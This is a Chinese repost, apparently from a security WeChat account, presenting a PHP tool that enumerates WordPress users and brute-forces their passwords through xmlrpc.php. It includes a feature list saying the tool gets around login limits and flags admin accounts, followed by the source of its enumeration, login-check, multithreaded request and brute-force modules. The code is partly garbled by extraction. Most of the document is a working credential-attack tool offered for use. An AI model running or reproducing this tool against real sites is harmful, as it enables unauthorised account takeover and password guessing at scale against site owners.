web破解 一般喜歡用 burpsuite 、hydra 通用性好但 一大堆參數(shù)使用是還需配置
破解wordpress 用wpscan 不得不說是很好用 功能多 而且經(jīng)常更新但 不是每次跑wordpress 都開linux (ruby 各種蛋疼)
1: 使用非常簡單 無需其它參數(shù)
shell>php scan.php http://www.target.com
2:多線程(異步) 同時進(jìn)行
破完一個用戶成功立即退出該任務(wù) 接著破另外一個用戶
3:自動生成用戶名相關(guān)并加到字典頭部
大大的提高破解速度
4:模塊可單獨使用
5:枚舉用戶模塊 能抓取大部分常規(guī) wordpress站點用戶
檢查枚舉到的用戶是否為登陸用戶 如果不是則剔除 大大的提高破解效率
6:該腳本 需curl 擴(kuò)展支持
7:利用wordpress 的xmlrpc.php 文件破解
可繞過限制 并判斷是否為管理員用戶
8、環(huán)境簡單
僅需 php.exe 、php5ts.dll 、curl.dll
文件說明:
init.php 配置及功能函數(shù) enum_user.php 根據(jù)頁面枚舉用戶 chkuser.php 檢測枚舉到的用戶是否為可登陸用戶 RollingCurl.php 多線程http請求類 (修改版) BruteWordPress.php 爆破類 scan.php 主文件(要運行的文件) pass.list 高頻率弱口令
init.php
enum_user.php
nv = 0; $this->rc = new RollingCurl(); $this->rc->callback = $this->create_request_callback($this->rc); $this->rc->__set('window_size', Thread); $this->rc->__set('time_out', TimeOut); } function create_request_callback($rc) { return function ($response, $info, $request) use ($rc) { $pattern = '/(author/(.*)/feed|options = array(CURLOPT_USERAGENT => USERAGENT); $this->rc->add($request); } $this->rc->execute(); if (count($this->names) == 0) { exit('[-] Unable to find user!'); } echo "[+] Find " . count($this->names) . ' users' . PHP_EOL; } function result() { return $this->names; } } ?>
chkuser.php
rc = new RollingCurl(); $this->rc->callback = $this->create_request_callback($this->rc); $this->rc->__set('window_size', Thread); $this->rc->__set('time_out', TimeOut); } function create_request_callback($rc) { return function ($response, $info, $request) use ($rc) { if ($info['http_code'] == 404 || $info['http_code'] == 403 || $info['http_code'] == 500) { echo '[-] Access error!' . PHP_EOL; $this->rc->cancelRequests(); } preg_match('#log=(.+)&pwd=#', $request->post_data, $out); $user = $out[1]; if (stristr($response, "" . $user . "")) { $this->names[] = $user; } if (stristr($response, 'Too many failed login attempts')) { $this->rc->cancelRequests(); } }; } function run() { include_once 'enum_user.php'; $collector = new EnumUser(); $collector->run(); $users = $collector->result(); printf("[+] %s Chkusers Loginname... ", date('hs', time())); foreach ($users as $user) { $url = domain . '/wp-login.php'; $post_data = "log={$user}&pwd=UjP8XnFD4n3LzIjlax"; $request = new RollingCurlRequest($url, 'POST', $post_data); $request->options = array(CURLOPT_USERAGENT => USERAGENT); $this->rc->add($request); } $this->rc->execute(); $counts = count($this->names); if ($counts == 0) { echo '[-] Warning Unable Check Loginuser!' . PHP_EOL; $this->names = $users; $counts = count($this->names); } echo 'login users:' . PHP_EOL; foreach ($this->names as $key => $u) { echo " " .iconv("UTF-8","GB18030//IGNORE",$u) . PHP_EOL; } printf("[+] %s Finded %d loginnames ... ", date('hs', time()), $counts); } function result() { return $this->names; } } ?>
RollingCurl.php
url = $url; $this->method = $method; $this->post_data = $post_data; $this->headers = $headers; $this->options = $options; } /** * @return void */ public function __destruct() { unset($this->url, $this->method, $this->post_data, $this->headers, $this->options); } } /** * RollingCurl custom exception */ class RollingCurlException extends Exception { } /** * Class that holds a rolling queue of curl requests. * * @throws RollingCurlException */ class RollingCurl { /** * @var int * * Window size is the max number of simultaneous connections allowed. * * REMEMBER TO RESPECT THE SERVERS: * Sending too many requests at one time can easily be perceived * as a DOS attack. Increase this window_size if you are making requests * to multiple servers or have permission from the receving server admins. */ private $window_size = 5; /** * @var float * * Timeout is the timeout used for curl_multi_select. */ private $timeout = 10; /** * @var string|array * * Callback function to be applied to each result. */ public $callback; public $master = null; public $requestList = array(); /** * @var array * * Set your base options that you want to be used with EVERY request. */ protected $options = array(CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30); /** * @var array */ private $headers = array(); /** * @var Request[] * * The request queue */ private $requests = array(); /** * @var RequestMap[] * * Maps handles to request indexes */ private $requestMap = array(); /** * @param $callback * Callback function to be applied to each result. * * Can be specified as 'my_callback_function' * or array($object, 'my_callback_method'). * * Function should take three parameters: $response, $info, $request. * $response is response body, $info is additional curl info. * $request is the original request * * @return void */ function __construct($callback = null) { $this->callback = $callback; } /** * @param string $name * @return mixed */ public function __get($name) { return (isset($this->{$name})) ? $this->{$name} : null; } /** * @param string $name * @param mixed $value * @return bool */ public function __set($name, $value) { // append the base options & headers if ($name == "options" || $name == "headers") { $this->{$name} = $value + $this->{$name}; } else { $this->{$name} = $value; } return true; } /** * Add a request to the request queue * * @param Request $request * @return bool */ public function add($request) { $this->requests[] = $request; return true; } public function cancelRequests($all = true) { $this->requests = array(); if ($all) { foreach ($this->requestList as $handler) { curl_multi_remove_handle($this->master, $handler); } } return true; } /** * Create new Request and add it to the request queue * * @param string $url * @param string $method * @param $post_data * @param $headers * @param $options * @return bool */ public function request($url, $method = "GET", $post_data = null, $headers = null, $options = null) { $this->requests[] = new RollingCurlRequest($url, $method, $post_data, $headers, $options); return true; } /** * Perform GET request * * @param string $url * @param $headers * @param $options * @return bool */ public function get($url, $headers = null, $options = null) { return $this->request($url, "GET", null, $headers, $options); } /** * Perform POST request * * @param string $url * @param $post_data * @param $headers * @param $options * @return bool */ public function post($url, $post_data = null, $headers = null, $options = null) { return $this->request($url, "POST", $post_data, $headers, $options); } /** * Execute processing * * @param int $window_size Max number of simultaneous connections * @return string|bool */ public function execute($window_size = null) { // rolling curl window must always be greater than 1 if (sizeof($this->requests) == 1) { return $this->single_curl(); } else { // start the rolling curl. window_size is the max number of simultaneous connections return $this->rolling_curl($window_size); } } /** * Performs a single curl request * * @access private * @return string */ private function single_curl() { $ch = curl_init(); $request = array_shift($this->requests); $options = $this->get_options($request); curl_setopt_array($ch, $options); $output = curl_exec($ch); $info = curl_getinfo($ch); // it's not neccesary to set a callback for one-off requests if ($this->callback) { $callback = $this->callback; if (is_callable($this->callback)) { call_user_func($callback, $output, $info, $request); } } else return $output; return true; } /** * Performs multiple curl requests * * @access private * @throws RollingCurlException * @param int $window_size Max number of simultaneous connections * @return bool */ private function rolling_curl($window_size = null) { if ($window_size) $this->window_size = $window_size; // make sure the rolling window isn't greater than the # of urls if (sizeof($this->requests) < $this->window_size) $this->window_size = sizeof($this->requests); if ($this->window_size < 2) { throw new RollingCurlException("Window size must be greater than 1"); } $this->master = curl_multi_init(); // start the first batch of requests for ($i = 0; $i < $this->window_size; $i++) { $ch = curl_init(); $options = $this->get_options($this->requests[$i]); curl_setopt_array($ch, $options); curl_multi_add_handle($this->master, $ch); array_push($this->requestList, $ch); // Add to our request Maps $key = (string)$ch; $this->requestMap[$key] = $i; } do { while (($execrun = curl_multi_exec($this->master, $running)) == CURLM_CALL_MULTI_PERFORM); if ($execrun != CURLM_OK) break; // a request was just completed -- find out which one while ($done = curl_multi_info_read($this->master)) { // get the info and content returned on the request $info = curl_getinfo($done['handle']); $output = curl_multi_getcontent($done['handle']); // send the return values to the callback function. $callback = $this->callback; if (is_callable($callback)) { $key = (string)$done['handle']; $request = $this->requests[$this->requestMap[$key]]; unset($this->requestMap[$key]); call_user_func($callback, $output, $info, $request); } // start a new request (it's important to do this before removing the old one) if ($i < sizeof($this->requests) && isset($this->requests[$i]) && $i < count($this->requests)) { $ch = curl_init(); $options = $this->get_options($this->requests[$i]); curl_setopt_array($ch, $options); curl_multi_add_handle($this->master, $ch); array_push($this->requestList, $ch); // Add to our request Maps $key = (string)$ch; $this->requestMap[$key] = $i; $i++; } // remove the curl handle that just completed curl_multi_remove_handle($this->master, $done['handle']); } // Block for data in / output; error handling is done by curl_multi_exec if ($running) curl_multi_select($this->master, $this->timeout); } while ($running); curl_multi_close($this->master); return true; } /** * Helper function to set up a new request by setting the appropriate options * * @access private * @param Request $request * @return array */ private function get_options($request) { // options for this entire curl object $options = $this->__get('options'); if (ini_get('safe_mode') == 'Off' || !ini_get('safe_mode')) { $options[CURLOPT_FOLLOWLOCATION] = 1; $options[CURLOPT_MAXREDIRS] = 5; } $headers = $this->__get('headers'); // append custom options for this specific request if ($request->options) { $options = $request->options + $options; } // set the request URL $options[CURLOPT_URL] = $request->url; // posting data w/ this request? if ($request->post_data) { $options[CURLOPT_POST] = 1; $options[CURLOPT_POSTFIELDS] = $request->post_data; } if ($headers) { $options[CURLOPT_HEADER] = 0; $options[CURLOPT_HTTPHEADER] = $headers; } return $options; } /** * @return void */ public function __destruct() { unset($this->window_size, $this->callback, $this->options, $this->headers, $this->requests); } }
BruteWordPress.php
rc = new RollingCurl(); $this->rc->callback = $this->create_request_callback($this->rc); $this->rc->__set('window_size', Thread); $this->rc->__set('time_out', TimeOut); } function create_request_callback($rc) { return function ($response, $info, $request) use ($rc) { if ($info['http_code'] == 404 || $info['http_code'] == 403 || $info['http_code'] == 500) { echo '[-] Access error!' . PHP_EOL; $this->rc->cancelRequests(); } $p = $request->post_data; preg_match_all('/([^s]+?) /', $p, $m); $user = $m[1][0]; $pass = $m[1][1]; if (!preg_match('/(d) /', $response, $is_admin)) { //echo '[*] Brote user ' . $user . " ..." . " "; } else { //print_r($is_admin).PHP_EOL; if ($is_admin[1] == 1) { echo '[+] Bruteed~ -> ' . iconv("UTF-8","GB18030//IGNORE",$user) . ':' . $pass . ' [is admin]' . PHP_EOL; $this->rc->cancelRequests(); } else { echo '[+] Bruteed~ -> ' . iconv("UTF-8","GB18030//IGNORE",$user) . ':' . $pass . PHP_EOL; $this->rc->cancelRequests(); } } }; } function run() { $pass_file = preg_replace('/s$/', "", file(wordlist)); $user_pre = array('123', '111', '1', 'a', 'pass', '!@#', 'password', 'abc', '1961', '1962', '1963', '1970', '1988', '1989', '1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2001', '2002', '2003', '2004', '2006', '2005', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015'); foreach ($user_pre as $pre) { $pre_u[] = user . $pre; } $p = array_merge($pre_u, $pass_file); $passwords = array_unique($p); array_unshift($passwords, user); foreach ($passwords as $pass) { $url = domain . '/xmlrpc.php'; $post_data = sprintf('', user, $pass); $request = new RollingCurlRequest($url, 'POST', $post_data); $request->options = array(CURLOPT_USERAGENT => USERAGENT); $this->rc->add($request); } $this->rc->execute(); } } $brute = new BruteWordPress(); $brute->run(); ?> wp.getUsersBlogs %s %s
scan.php
run(); $user_arr = $chk->result(); //print_r($user_arr); function broter($user) { system('php BruteWordPress.php ' . target . ' ' . $user); } printf("[+] %s Broting... ", date('hs', time())); foreach ($user_arr as $user) { echo '[*] Brute user ' . iconv("UTF-8","GB18030//IGNORE",$user). " ..." . str_repeat(' ', 60) . " "; broter($user); } show_time(); ?>
-
配置
+關(guān)注
關(guān)注
1文章
188瀏覽量
18375 -
腳本
+關(guān)注
關(guān)注
1文章
389瀏覽量
14858 -
wordpress
+關(guān)注
關(guān)注
0文章
34瀏覽量
2876
原文標(biāo)題:wordpress 用戶枚舉,爆破工具
文章出處:【微信號:菜鳥學(xué)安全,微信公眾號:菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
發(fā)布評論請先 登錄
相關(guān)推薦
評論